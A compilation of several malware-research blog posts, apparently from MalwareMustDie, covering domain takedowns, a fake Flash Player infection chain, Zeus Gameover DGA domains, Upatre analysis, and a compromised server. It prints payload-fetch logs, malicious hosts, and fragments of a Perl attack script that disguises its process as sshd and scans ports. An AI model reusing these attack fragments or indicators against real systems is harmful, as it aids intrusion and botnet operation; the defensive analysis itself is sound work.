These bad domains are having the same bad actor's route. The registration information of the domain list stated below is traceable to the positive potential evidence for the ID of the actors that can be used for law enforcement investigation on following this cyber crime case, LE will be needed to directly request via ICANN to Registration entity accordingly.
Any malicious system exploitation and malware infection traffic recorded and logs related to the verdicted domains and its IP Addresses can be used as the evidence of the cyber crime activities, please pass it to your nearest CERT for the further process. The IP recorded in each logs could be still in operation, is a good material for the further monitoring and mitigation of the threat and this post can be used as reference officially. Please be noted of this advisory.
Tango Down
1. Under NAMECHEAP.COM (LA, USA) Registrar (Count: 13) - Status:serverHold: STATUS: Status:serverHold
$ date && bash check_nonru.sh Thu Feb 13 20:57:51 JST 2014
Sunday, February 16th 2014, on the presentation on AV Tokyo 2013.5, a prestigious security event in Japan (link), we (read: MalwareMustDie, an NPO of Anti Cyber Crime International Research Group) announced the connection between several Cyber Crime actions (malicious abuse of computer exploitation and credential with the usage of malware) of: CookieBomb (IFRAME from the "North") infection (link), Kelihos Botnet infection (link), Spam that lead to malware infection / Malvertisement (link), and the usage of malicious exploitation tool as RedKit/Goon/Infinity for malware infection (link), which is causing series of abusive accusation against the Japan National Cyber Space & Networking Jurisdiction under the following security violation verdicts:
(1) Remote hack on personal computers of national individual/entities (2) Stealing of credential and privacy property of national individual/entities (3) 30,000+ malicious code injection by web hacking to national service infrastructure (4) Abuse utilization of national computers to distribute malware worldwide.
The presentation video (censored):
The crime, which is currently still in progress for a significant long time with the incremental trend on damage-quantity upon the verdicts stated above, with was proven by submitting all of investigation fact and evidence that lead to a One Russia Federation Citizen Individual Crime Suspect (link), where the detail of actor's identification was "beyond any doubt" announced in the event to the Japan national security community, was followed by officially filing all investigation material on category of: National Cyber Crime Abuse and Act of Terrorism aganist National Network, reported to the National Police Agency, Japan - Cyber Force Center, High-Tech Crime Technology Division - Cyber Terror Incident Handling Unit (link). With notifying Information-technology Promotion Agency - Japan (link), JP-CERT/CC (link), Interpol Digital Crime Investigation Support, Europol EC3 (link), and Anti-Phishing Working Group (link), and several European law enforcement agencies related, with witnessed by important national security top-notch researchers.
The fact that has been collected over the investigation time frame, and the unbearable raise of casualty and damage of the crime in progress on the Japan national computer infrastructure was clearly presented to the national security community attendants in the event, and it was urged to raise the serious national security issue against the malicious act of a Russia Federation Individual Citizen (link) who is still performing his daily basis crime activity in abusing Japan national network.
We hope to raise an official request for cooperation from Japan law enforcement to Russia Federation law enforcement to conduct a firm act to stop this crime and terror effort for good. The further delay action from law in Russia Federation against the positive confirmed individual suspect will only prolong the unnecessary damage on victims in Japan soil, not to mention to other countries that has been victimized like Taiwan, India, Ukraine, Georgia, Poland and Russia Federation's victim itself as the top hit of the threat, or, to other countries in Europe that has been abused and used as control center server of this malware activity.
To be noted, Kelihos Botnet infection itself is also spotted infiltrating United States personal computer dial up infrastructure, and the investigation information of the threat with its relation to the a notorios spammer (link) and its identification also was reported accordingly to Federal Bureau of Investigation in United States. To all victimized countries of the same threat, we urge you to do the same procedure like we are conducting here in Japan via filing official crime report to be followed and escalated properly by your law enforcement to the Russia Federation law enforcement.
MalwareMustDie,NPO and partners in investigation were in this operation since August 2013, the real identification of the bad actor was revealed in September, 2013 with the collaboration of our crime investigation partner in Russia Federation, GroupIB (link), who was filing the case to the Russia Federation law enforcement on October, 2013. We revealed the weakness of the botnet in BotConf 2013, December 5th, 2013 in Nantes, France. With as proof of concept in stopping the malware payload and positive ID the CNC owner we did the "takedown" on most of Kelihos botnet CNC between December 1-3, 2013.
Today, I almost went to bed when bumping into this threat. Please kindly bear the sleepy eyes on writing these. I am combining the screenshot and log/details in texts, hopefully there will be no filtration product would block this post for a bit of URL's paste.
This writing contains many points that are important information for fellow friends and the mentioned public services to be aware of being abused by this malware infection session. So I wrote this as fast as possible and leaving payload binary analysis and exploit analysis in a rain check. To anyone who can help to contact the related abuse, is very highly appreciated.
Infection Source:
First of all. The source of infection is the malware infection code/scripts that was implemented in the below IP and domain, located in OVH network, in France, I really hope to have help from France friends to clean this IP from any malware infector toolkits installed:
Secondly, the infector, is starting from Japan's IP under domain: shortening .biz This needs to be cleaned up too, yet I think there are more infectors exist..
The background
It started when checking a suspicious URL, accessed it in the browser as per below:
I regenerated with the separate scheme to record the below log (for the source of infection details purpose), just to make sure that we had everything in our hands:
--2014-02-24 02:40:02-- h00p://shortening .biz/qnwr Resolving shortening.biz... 59.106.171.55 Caching shortening.biz => 59.106.171.55 Connecting to shortening.biz|59.106.171.55|:80... connected. : GET /qnwr HTTP/1.1 Host: shortening.biz HTTP request sent, awaiting response... : HTTP/1.1 301 Moved Permanently Date: Sun, 23 Feb 2014 17:40:03 GMT Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e Location: http://shortening.biz/qnwr/ Keep-Alive: timeout=5, max=19 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 : 301 Moved Permanently Registered socket 4 for persistent reuse. Location: http://shortening.biz/qnwr/ [following] Skipping 302 bytes of body: [ 301 Moved Permanently Moved Permanently The document has moved (A HREF="h00p://shortening .biz/qnwr/")here(/A) Apache/1.3.42 Server at shortening.biz Port 80 ] done. : --2014-02-24 02:40:03-- h00p://shortening .biz/qnwr/ GET /qnwr/ HTTP/1.1 Host: shortening.biz : HTTP/1.1 200 OK Date: Sun, 23 Feb 2014 17:40:03 GMT Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e Last-Modified: Thu, 23 Jan 2014 14:54:18 GMT ETag: "1135-52e12d1a" Accept-Ranges: bytes Content-Length: 4405 Keep-Alive: timeout=5, max=19 Connection: Keep-Alive Content-Type: text/html : 200 OK Length: 4405 (4.3K) [text/html] Saving to: ‘sample.mmd’ 100%[=======================================================>] 4,405 --.-K/s in 0.009s 2014-02-24 02:40:03 (459 KB/s) - ‘sample.mmd’ saved [4405/4405]
Back to the browser, in the short while the browser's address bar flickering to the redirection URL as per below: And this act is confirmed by the series of the html tag meta refresh code grepped below:
What happened next? I was being forwarded into a page with video of "a lady in the bed" as per captured below: I just about to praise on how fortunate I am.. but the video soon got stopped and the warning message came up with popping the download of the Flash Player Setup.. as per shown below:
The Path to Payload
Back to the shell, I simulated the download page for evidence: And that was giving me the below script actually: And now we know why I got that redirection, the dropboxusercontent.com (the very bottom link) is serving the infection landing page and I was redirected into it. Will explain this later on. And there are other conditions for another redirection, for the mobile access and Opera browser in the GOO.GL short URL. Anyway if we extract those Short URL for Mobile and Opera browser we'll find the better image: (I will have to leave other friends to check those two link deeper..)
And this is the malware file downloaded if you are matching to the desired condition: Now this payload is well detected by AV industry as per shown in VirusTotal result here-->>[link] If you run the payload you will get the query and response in HTTP as follows: And this payload is downloading a "config" with the info on hash and URL of another malware, as per shown here: Here's that "guncel.exe" malware download session in my shell..a simple wget will do..This could be the updates or sort of. This is the VirusTotal report of the "guncel.exe", is the same file as original payload, it is also as an evidence explaining that the origin of the payload is wjetphp.com (46.105.55.251)-->>[link], the detection rates as the VBA basis Trojan Downloader is not so bad after all, good work.
Below is interesting trace of what this malware did in the memory:
This is just some traces of VBA calls used..(during the creation of registry key)
Quick analysis that might help fellow researchers and infected victims:
The payload will download the background.js JavaScript w/URL planted in the binary, as per traffic below: Which is having the script as I pasted here-->>[link] ↑You can see clearly the malicious traffic redirection scheme and access URL to the landing page (origin of the infection), in that script..
The next traffic will explain how this background.js is called, the file manifest.json was downloaded, it contains the script to show how background.js is executed by setting several security privileges for the execution of the script itself.. You can see the effort to fake "Google Shockwave Player" (any such product??) upon the execution of background.js above? Things are starting to make much sense on why so many Google related "images" are used here.
PS: I will add some more reversing notes later on, but shall we move on a bit..too little time..for there are more important parts to cover..
What happened if we simulate the landing page access in shell is something like this:
GET /s/pwuh8wdutwot4dg/rezillik.html HTTP/1.1 Host: dl.dropboxusercontent.com : HTTP/1.1 200 OK accept-ranges: bytes cache-control: max-age=0 Content-Type: text/html; charset=utf-8 Date: Sun, 23 Feb 2014 21:01:55 GMT etag: 2n pragma: public Server: nginx x-dropbox-request-id: ecd60af812734360278c876a87176a00 X-RequestId: 6f612d52e7e3c0e526aa4b355328e047 x-server-response-time: 202 Content-Length: 6841 Connection: keep-alive : ---response end--- 200 OK Registered socket 4 for persistent reuse. Length: 6841 (6.7K) [text/html] Saving to: ‘sample4.mmd’
How I got the payload being downloaded then?? Let's see the code inside the page. Well..It seems like I got hit by the timer function stated by this code: The Google short URL is again being used to hide the real malware payload URL which is served in the Google Code SVN download!! The download log can be seen in the follow up section..
Well..the bad guy behind this is really trying hard to convince victim about the Google kind of application is installed :-)
Conclusion
How to conclude this matter generally? Obviously the public well-known internet services was targeted to spread this infection. Let me describe how many of those abused services spotted in this single case: Number one, amazonaws.com (property of Amazon AWS) is utilised by this actor for the etc bad purpose scheme (see the mobile link and Opera browser link on the above explanation, whatever it is, is not a good thing), we'd better warn Amazon AWS for this link. Number two is, dropboxusercontent.com (property of Dropbox, Inc) is also utilised to serve payload malware. Is that all? No. Number three: see the domain in payload URL, googlecode.com, it is the abuse of Google Code's SVN facility. More? Yes, the last one, number four, goo.gl service, the Google ShortURL is also abused to hide the URL of the malware payload.
The Google code is being abused to serve malware payloads of this threat's series for quite a while, you can view the reports posted by our friend @sarimura (twitter) to the Project Hosting on Google Code in Google groups-->[here]. It shows how persistent the malware actor to always create a new google project and to use its download URL to serve the malware payloads. On the other hand it shows that the bad actor(s) is leaving many traces in Google Code servers during uploading the payloads (account ID, IP addresses, etc).. a hint to follow isn't it?
Sample
I share all sample, under usual password, click the picture below to download:
Moral of the story: Our beloved internet and its services are badly abuse by malware. Stay safe please! PS: Comments and additional are to be added in follow up section! And it looks like this threat is bigger than expected so I could't sleep again, gotta go to day work now!
Follow Up
Please help suspend user "buexe-x" of GoogleCode, he is spreading malware in via SVN - Attached=download log >@Googlepic.twitter.com/FT8cXTFFkg
This post is the tribute to the hard working invidivuals and professionals who made the impossible happened.
The Report
As one of the result of a persistent collaboration between security researchers and domain registration process. Following the previous suspension effort of Nuclear Pack Exploit Kit domains (link). On behalf of individuals & professionals involved in the process, we dare to announced the suspension process of 209,306 Nuclear Pack domains on TLD: ".IN.NET". Is the biggest Tango Down score in the history of MalwareMustDie.
For the security purpose we can not say much details about this matter yet, except that all of the domains are positively "verdicted" for its involvement in the DGA scheme of the malicious infection toolkit, and are positively confirmed to their preliminary registration investigation suspicious facts beforehand. The bad actor(s) is preparing these domains to serve malware, and the usage of these domains are blocked with the currently spotted active domains are all suspended.
We announced the tango news here to signal the law enforcement and authority to start investigating the listed suspended domains, that contains the data which can be used as cyber crime evidence on malware infection effort through software exploitation by abusing mass .IN.NET internet domains.
The full list of the DGA domains used and the checking report is very long that we can not paste them all here in the post or pastes (yet), but this is the link of the extracted DGA domains -->[here] < Thank you @jedisct1 and Gist!
Good Work Credit
Special thank's for the great cooperation from DOMAINS.IN.NET Team, what a speedy and solid work! It is a very long list but you checked it instantly following to the swift suspension. The special credit goes to our friend Mr. Frank Denis of OpenDNS for the DGA decoding and its report, our Tango Department leads by Mr. Sachin Raste of eScan, side by side with Mr. Conrad Longmore, Mr. Dhia Mahjoub of OpenDNS and other managers from varied entities that we can not mention you all here, who are actually silently fighting this threat in a tough daily routine, Salud!
The process is not stopping in here. There will be more follow up.
This end of week, Zeus P2P Gameover (in short: GMO) is having a large campaign by utilizing Upatre (with using latest version to download encrypted ZZP file w/many extensions) which are riding the Cutwails spambots (I checked those by IP and templates). As so many good writings and coverage stated out there, these recent GMO is having a new trend to use Necurs Rootkit, sending new callback (with POST /write) HTTP header to the CNC, dropping themself (GMO payloads) with the polymorphic hashes to evade detection, thus tons of randomized DGA to fire P2P callbacks for the botnet functionality purpose (the last one is apparently not new).
Shotly, this new "trend" with the large volume of campaign brought my interest, so I started to collect what came up to my honeypot from March 18, 2014 until today as the background of this post.
The Quick Research
Below is the pictures of the malvertisement that the crook was kindly sent me personally:
There are many interesting details about this threat, like VRT (link) and CERT Polska (link), which are very good reports! Since I am dead busy right now, so please kindly bear with this short post, and I won't wrote much of etc technical details covered in previous reports by others. SO I want to stress here is only one aspect: the DGA callback domains used by GMO (as per below picture) which wasn't covered much in prev. articles, but it is important to understand and learned since the DGA used by GMO is having their weak points to be used stop or mitigate the threat, and giving the bad actor behind the scene a "sting" :))
What's with these "Lame" DGA?
By skipping the details of reversing binaries for security purpose and and comparing the result in the forensics, I collected these callbacks as per below list of domains:
These are the "Lame DGA" that GMO uses, means these are strings that are being decoded in the malware binary and without seeds, a wannabe DGA (Domain Generation Algorithm) which is not randomized and the logic of extracting each strings is in the GMO binary itself for the listed samples I stated above. One doesn't have to be a reverser to figure some of these "Lame DGA" domains are used & spotted over and over in many samples. So why so many domains made, and "looks" to be randomized in name? "Maybe" they (as of GMO crooks) want us to think as DGA to avoid blocking actually. It is an insult to decent people's intelligent and will be a massive big #FAIL for the crooks itself if people starting to aim cannon for this weak spot (yes, friends, aim your cannon there, THERE!).
What? Blocking? Is it blockable? Not a decoy or something? Are these really activated? < Answer of all these generally are "YES!", and also could be a decoy too (if they're not going to activate these domains anyway). Great, isn't it? :D
Activation, IP Information & Getting Closer to CNC??
As the PoC: Now (TODAY to be precised) I found four of the domains above is actually activated and ALIVE:
With the details information below: Yes, LINODE is having a serious matter with Zeus/Gameover, because all of these IP addresses are GMO's control and centre front ends :-))
These 4 (four) and just added one new (will add more) IP addresses, which are also not ISDN/pool IP, but a static IP, and two of them are in the status of Corporate ones. So if you think that these four IPs are the peer-tp-peer's or infected PC's IP, the answer is no, and please start to deduct the further investigation step on why GMO is collaborating these IPs.
ADDED: Cut the crap! What's the connection of the DGA to CNC??
I was asked many questions about what's this DGA actually does. I will try to write simple explanation as per follows, sorry to my fellow researchers to burp this fact here, because "some people" are starting to think that I am trying to sell "candy bar" here..
Gameover is rapidly requested DNS for the active IP address of CNC by using this DGA, "WITH OR WITHOUT internet connection" (since I heard a noise said to prevent internet connection to make GMO querying lots of domain..which is just WRONG). Even the connection of internet exists, GMO will request the rapid calls as per screenshot PCAP above (see below for re-post) The purpose is to confuse researchers and they are aiming only one (or max: two) IP address(es) of CNC that actually being registered under "few" of "tons" of lame DGA domains. To be more clear, take a look of the PoC below:
As the PoC look at the latest sample's DGA, we detected the activation of the IP address below:
Receiving the IP address from the DGA requested, then GMO can send request to the CNC as per below PoC in real: This is the connection, and how the DGA is actually very important for Gameover communication to the CNC, blocking these DGA will block its communication to CNC, and without CNC connection GameOver is just "another" bonnet without master's command and control and will work on peer to peering each other without any control from the herder < this is the connection you all asked for, this is the attack point. (Forgive me the God if InfoSec to burp this info out in public here, there is no way I can convince others without telling this fact loud and clear..)
What's the point??
Below are my points, I make it as simple as possible:
1. Get these DGA domain registration info! These DGA is registered only by the bad actor, is not hacked sites, is not a hacked domains. We have tons of experience now for nailing crook's ID by this method, so please extract the information from your known registrars and please passed to law enforcement immediately.
2. A suggestion; Chance to catch "in the act". The unregistered domains will likely to be registered sooner or later after the current ones are blocked/suspended, so it is a good for registrars, CERT and law enforcement to make an extra effort: A list, or better yet, an Auto Block Scheme and maybe a Direct Alert System to be sent to law enforcement to trap the crook's collaborated channels to be "caught in the act" to be legally investigate.
3. Do it NOW. GMO coders is implementing the logic of the DGA in the GMO binary which are stuff that is not easily remake, unless redeveloping big part of the current malware, so we can hope this scheme lasts for a while, so it is a chance for good guys! :-))
4. Words for the "malware crooks": I really love to see malware "crooks's" faces while they're reading this post :P) A few words for the malware coders from us; We are security engineers here, we reverse stuffs very good, we investigate things deep, don't make us coming at you now, STOP your coding malware practise and get the decent work like all of us. Life, no matter what, is never easy, let's code something useful & positive even we only receive few pennies for it.
Mr. Conrad Longmore was extracting more related DGA via verdicted IP addresses above, thank's Conrad so we don't have to crack binary per binary to get these. Please visit Dynamoo Blog in the link below:
What we are posting here is the knowledge for awareness of many PC users, the victims who are getting many hits by this malware's infection, whose credentials were stolen in some botnets panel by these GMO's affiliated gates/panels, to inform you that actually there are so many methodology that can be applied and executed to stop the malware infection scheme that is coming from/using internet. As long as the good guys are still in control in the networking and internet, the scheme to stop malware infection via malvertisement can always be applied. The only problem is always: HOW BAD we REALLY want to stop these malware?
Following the previous blog (link) of Zeus P2P Gameover (GMO) malware delivered by the Upatre trojan downloader from some encrypted form with varied file extension names. Today I found that the threat returned to previous model of Upatre downloader scheme (via SSL). Just in case I post it here, is not a new stuff, hope can help some friends:
The spam sample is like this: *) The attached executable samples can be viewed at the bottom of this post.
The Upatre binary analysis
Some notes of the attached archived PE:
Compile Time: "0x533C67DB [Wed Apr 02 19:41:15 2014 UTC]" Identified compiler : "Microsoft Visual C++ 5.0/6.0" Entry Point at section: ".text" CRC Fail: "Claimed 90984, Actual 77672" Sigs: "Verified:Unsigned, Publisher: n/a" Bad Entropy: ".text Flags: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ Entropy: 6.336388 (Min=0.0, Max=8.0) MD5: 28f4e63b3406fb9343aaf369f1897fb0"
I also use our beloved PeStudio downloaded from winitor.com for the reliable alert's check:
// Note about MSVCRT.DLL is the Microsoft Visual C Run-Time Library (and MSVCPP.DLL is the standard C++ library) for Visual C++ version 4.2 to 6.0. It provides programs compiled with these versions o f Visual C++ a typical set of library functions required by C and C++ programs. These i nclude string manipulation, memory allocation, C-style input/output calls, etc. The msv crt.dll is now a "known DLL," meaning that it is a system component owned and built by Windows. It is intended for future use only by system-level components.
So.. combined with the below's system's used "internals calls"... this "software" is likely never good..
Note: I tend to call it encrypted since it needs a XOR key to decrypt it, see the following notes. Note: There are some more obfuscated data in other places too (in .data, .rdata, and .rsrc), this binary is literally encrypted.
If we solve the above obfuscation (which I can not) it should give codes for method to decrypt the encrypted traffic, downloads malware from assigned hosts. If you don't have disassembly you can use the raw disassembler result from IDA free version I pasted here--> (link) to start the reversing process.
Another note: the "start" point is in .text section, it checks environment there (plus few evasion tricks) and go to wWinMain which contains the real deal of decrypting the obfuscated data. In the wWinMain I can see a below interesting checking pattern after XOR:
"deobfuscation pattern, repeated more than one.. (three times actually with different used registers") [...] push edi pop edx mov eax, [ebp+var_60] rol eax, 6 add eax, 455E4A5h mov [ebp+var_3C], eax mov edx, 136C6E9Bh mov [ebp+var_1C], edx mov ecx, 7E0C0B9Ah mov [ebp+var_68], ecx mov eax, 668758F1h mov [ebp+var_14], eax mov edx, 5D1E4FCDh mov [ebp+var_18], edx mov ecx, 0FFFFFFFFh mov [ebp+var_C], ecx call sub_4015A0 [...] <=== "xor'ed and checked"
"called checks to sub_4015A0: " push ebx push esi push edi mov ebx, [ebp-80h] xor ebx, 0ABED8791h <====== mov edx, 40000000h ror edx, 0Eh cmp ebx, edx // the checks. jb sub_401464 // end stuff here...
How does it work?
This is what I saw. The Upatre during execution is communicating to below host:
kionic,com / 64,92,125,121 (Netfronts/U.S.A.)
via TLSv1 (SSL): which fetching the microsoft certification patch's URL and Comodo's encryption certification's URL:
Next, these data will trigger each URL in the list to be downloaded by the Upatre itself as per shown below:
Some reference for you of the explanation what was downloaded from the microsoft site:
Is a patch to revoke certification, was intended to make sure the following Comodo certification can be installed successfully:
This is the one that can be downloaded successfully:
Next.. Upatre downloads a binary blob via an encrypted communication (SSL) from kionic.com (64.92.125.121): To be more viewable:
The downloaded malware is to be saved and registered (autorun) in:
Not much to tell (kudos good people who fight this threat well!), instead is an usual installation (the batch), and drops its rootkit & hooked itself in registry, after a while it starts querying some DGA as below:
— MalwareMustDie, NPO (@MalwareMustDie) April 3, 2014
Samples, Traffic and VT
Below is the sample's snapshots: Please download via Kernel Mode-->(link)
Matrix of stages infection's detection ratio (VT)
This time I would like to make a matrix of the detection ratio of the malware by the time I analyze this sample. I used the VirusTotal (VT) scores for the comprehensive result purpose. Please be noted that VT score is based on part of signature (not overall filtration and) detection used by AntiVirus industry, so it is just not an exact measurement, but is good enough to give the idea of how is the detection on this threat by AV industry in every form of samples (during infection stages) on this infection.
The "Stages" column explained the form of the malware during the infection process as the object to be scanned by AV products. I started from the stage 1 as the email data itself, goes to the attachment in zip, PE, PE self copied after being clicked, the downloaded GMO, self-copied GMO and rootkit downloaded/used. Feel free to comment for improvement:
That was actually the first time of attack series we received as per listed here-->PASTEBIN Had it enough, so I started to investigate this matter thoroughly. With the help from @malm0u53 I was lead to the source of attack, and start digging deeper over there to find stuffs that are malicious enough to make good person got shocked.
This report actually contains many way to mitigate the similar attack in the future, and also for understanding the source and nature of the current threat. For the Firewall/IPS/IDS filtration research, maybe this poor English writing can be used as reference. I will share the samples upon ready, contains very dangerous tool-kits & packages found. Following is the report in details..
Seeing the details of each IP..to prioritize the examination:
DATE | IP | REVERSE | ASN | NETWORK PREFIX | AS CODE | cn | ISP CODE | ISP NAME ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Sun Oct 20 22:18:15 JST 2013|118.26.203.66 | - |23724 | 118.26.200.0/21 | CHINANET-IDC-BJ | CN | - | FOREST ETERNAL COMMUNICATION TECH. CO.LTD Sun Oct 20 22:16:47 JST 2013|211.162.16.164| - |4837 | 211.162.16.0/20 | CHINA169 | CN | SZGWBN.NET | BEIJING GUOXIN BILIN TELECOM TECHNOLOGY CO. LTD Sun Oct 20 21:23:04 JST 2013|58.211.18.184 | - |23650 | 58.211.16.0/21 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK Sun Oct 20 21:23:03 JST 2013|197.221.26.250| - |37153 | 197.221.0.0/18 | HETZNE | ZA | YOUR-SERVER.CO.ZA | HETZNER (PTY) LTD Sun Oct 20 21:23:06 JST 2013|2.228.117.30 |2-228-117-30.ip191.fastwebnet.it.|12874 | 2.224.0.0/13 | FASTWEB | IT | FASTWEBNET.IT | FUTURA ENTERPRISE Sun Oct 20 21:23:08 JST 2013|46.105.124.119|poc2.polyspot.com. |16276 | 46.105.0.0/16 | OVH | FR | OVH.COM | OVH SYSTEMS Sun Oct 20 21:23:09 JST 2013|212.227.251.6 |s15378439.onlinehome-server.info.|8560 | 212.227.0.0/16 | ONEANDONE | DE | 1AND1.CO.UK | 1&1 INTERNET AG
Using lynx to check the validity of HTTP status in each server...
$ lynx -head -dump http://197.221.26.250 Looking up 197.221.26.250 Making HTTP connection to 197.221.26.250 Alert!: Unable to connect to remote host. lynx: Can't access startfile http://197.221.26.250/
While 211.162.16.164 (thank's to MalMouse for noticing this!) lead us into the source of attack: In the source: Let's enlarge the point that described the source: Well, this is what the source of the attack, a hacked site, I marked in green color the hack files..the site itself is full of the URL redirection that I can not comment as clean site itself, but I will focus to the w00tw00t attack component only:
Connected to 37.1.192.220. 220 FTP Server ready. Name (37.1.192.220:rik): test 331 Password required for test Password: 230 User test logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -alF 229 Entering Extended Passive Mode (|||1460|) 150 Opening ASCII mode data connection for file list drwxr-xr-x 18 test admin 4096 Sep 2 20:22 / drwxr-x--x 10 test admin 4096 Oct 13 18:02 ./ drwxr-x--x 10 test admin 4096 Oct 13 18:02 ../ -rw-r--r-- 1 test admin 7 Oct 12 10:51 .codepage -rw-r--r-- 1 test admin 37287 Oct 13 15:53 .dsf drwx------ 2 test admin 4096 Aug 24 08:25 bin-tmp/ -rw-r--r-- 1 test admin 10368191 Sep 30 20:27 "blackcat.jpg" -rw-r--r-- 1 test admin 19609 Oct 1 19:11 "bot.zip" drwxr-x--x 2 test admin 4096 Aug 7 2012 email/ drwxr-xr-x 2 test admin 4096 Nov 27 2012 etc/ drwxr-xr-x 4 test admin 4096 Nov 26 2012 home/ -rw-r--r-- 1 test admin 2043 Oct 8 08:58 "logclean" -rw-r--r-- 1 test admin 650 Oct 8 08:58 "logclean.tgz" drwxrws--- 2 apache admin 757760 Oct 20 14:16 mod-tmp/ -rw-r--r-- 1 test admin 416 Oct 12 09:17 "muhrc" -rw-r--r-- 1 test admin 37281 Oct 13 16:34 "perl" drwxr-x--x 2 test admin 4096 Aug 18 11:18 php-bin/ -rw-r--r-- 1 test admin 480699 Oct 13 11:33 "pma.tgz" -rw-r--r-- 1 test admin 76 Oct 11 10:16 "psybnc.conf" -rw-r--r-- 1 test admin 130892 Oct 13 18:02 "screen.tar" -rw-r--r-- 1 test admin 96937 Oct 8 08:56 "test.txt" lrwxrwxrwx 1 apache admin 7 Aug 7 2012 tmp -> mod-tmp/ -rw-r--r-- 1 test admin 3623 Sep 30 12:30 "unrealircd.conf" -rw-r--r-- 1 test admin 84852 Oct 13 18:01 "vuln.txt" -rw-r--r-- 1 test admin 37026699 Oct 6 13:12 "vulnmare" drwxr-x--x 11 test admin 4096 Sep 15 13:00 www/ -rw-r--r-- 1 test admin 5323 Oct 12 14:29 "x.pl" -rw-r--r-- 1 test admin 11934 Oct 7 19:19 "xvuln.txt" 226 Transfer complete
And yes, I grab them all..
Threat Components..
The below files is the list and log used for the w00tw00t attack:
-rw-r--r-- 1 test admin 84852 Oct 13 18:01 "vuln.txt" -rw-r--r-- 1 test admin 37026699 Oct 6 13:12 "vulnmare" -rw-r--r-- 1 test admin 11934 Oct 7 19:19 "xvuln.txt"
And the below file is the w00tw00t attack script itself:
-rw-r--r-- 1 test admin 5323 Oct 12 14:29 "x.pl"
These files are the set of the hacking tools injected to this site:
-rw-r--r-- 1 test admin 650 Oct 8 08:58 "logclean.tgz" -rw-r--r-- 1 test admin 480699 Oct 13 11:33 "pma.tgz" -rw-r--r-- 1 test admin 130892 Oct 13 18:02 "screen.tar" -rw-r--r-- 1 test admin 19609 Oct 1 19:11 "bot.zip" -rw-r--r-- 1 test admin 10368191 Sep 30 20:27 "blackcat.jpg" -rw-r--r-- 1 test admin 37281 Oct 13 16:34 "perl"
PS: the blackcat.jpg is actually a GZIP:
Ziped component #0 Compression Deflated ExtraFlags (none) Flags (none) ModifyDate 2009:10:15 03:21:19-07:00 4 years, 5 days, 4 hours, 31 minutes, 25 seconds ago OperatingSystem Unix File Size 9.9 MB File Type GZIP MIME Type application/x-gzip
Peeling the Code: w00tw00t Attack Script - x.pl
Was written in pure Perl, the script is used to pwned the web server which having the vulnerable PHP, with injecting thus extracting all of the "package" files injected to the compromised server, and start to connect the server to the "master" via IRC channel. Below is the breakdown of the codes for the image: Using these Perl modules:
#!/usr/bin/perl
# MODULES
#use warnings; use Parallel::ForkManager; use IO::Socket; use URI::_foreign; use URI::_generic; use URI::_query; require URI::_foreign; use URI; use LWP; use LWP::Simple; use LWP::UserAgent; use LWP::Protocol::http; use URI::http; use HTTP::Cookies; use HTTP::Request::Common qw(POST); use HTTP::Headers; use HTML::Parser; use Parallel::ForkManager; use IO::Socket; use LWP::Simple; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common qw(POST); use HTTP::Headers; use Getopt::Long; use Time::HiRes qw(gettimeofday); use MIME::Base64;
How they define the User-Agent, Time Out, Payload & shell:
#use strict; my $ua = LWP::UserAgent->new(agent =>"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20); my $hostfile="vuln.txt"; my $word=".dsf"; my $maximumprocess="50"; my $hiddenprocess='/usr/sbin/sshd '; my $eth="eth0"; my $spd='7'; my $scanclassb; my $scanclassa; my $explhost; my $explpayhost; my $explpayloadfile;
This is where the exploitation & its component was defined:
The ATTACK logic of #w00tw00t used in this attack is very simple... With some error trapping and.. they're not very friendly to their users... Here's the main exploit function, noted: the extracting the PMA hacking tools to pwn the server: Finally the scan wit activating PMA toolkit..and deletion of the toolkit extracted components..
Post #w00tw00t pwned..(1) The Evil Redirection Service
This is the main concept of the attack, explaining WHY this server has so many "weird" redirections. This server itself was pawned and becoming host of evil redirection service, as per one of some dir below:
ftp> cd bin-tmp/ 250 CWD command successful ftp> ls -alF 229 Entering Extended Passive Mode (|||49723|) 150 Opening ASCII mode data connection for file list drwx------ 2 test admin 4096 Aug 24 08:25 ./ drwxr-x--x 10 test admin 4096 Oct 13 18:02 ../ -rwx------ 1 test admin 4564 Jun 15 2007 cgi.php* -rw------- 1 test admin 198 Aug 24 08:22 sess_02b1133c97f1cfe501c49939044db715 -rw------- 1 test admin 233 Aug 24 08:23 sess_09e938787c74a1345b62c0cddb6e7ffb -rw------- 1 test admin 0 Aug 24 08:23 sess_0ea5482947611be5265c62949367ac1c -rw------- 1 test admin 203 Aug 24 08:24 sess_103115f99c01d5a2f99a000c17e413c2 -rw------- 1 test admin 0 Aug 24 08:23 sess_145adf08b9432c2884dd4f174ebeb7d3 [...]
If you se the inside of CGP.PHP file itself is a PHPSHEL v1.7:
Post #w00tw00t pwned..(2) The Network Attack Tool (Portscnner, DDoS, etc)
Not a surprise anymore to find an attack tool in the case like this, it seems like is the part of the package actually. Below is the snippet code used for the attack (the snipped codes was cut and modified, so it is "neutralized"). File:
-rw-r--r-- 1 test admin 37281 Oct 13 16:34 perl (this is the shadow of the below file, self copied by the main script) -rw-r--r-- 1 test admin 37287 Oct 13 15:53 .dsf
Below are the evil code snippets for the PoC purpose:
The Port Scanner:
# Default quick scan ports my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
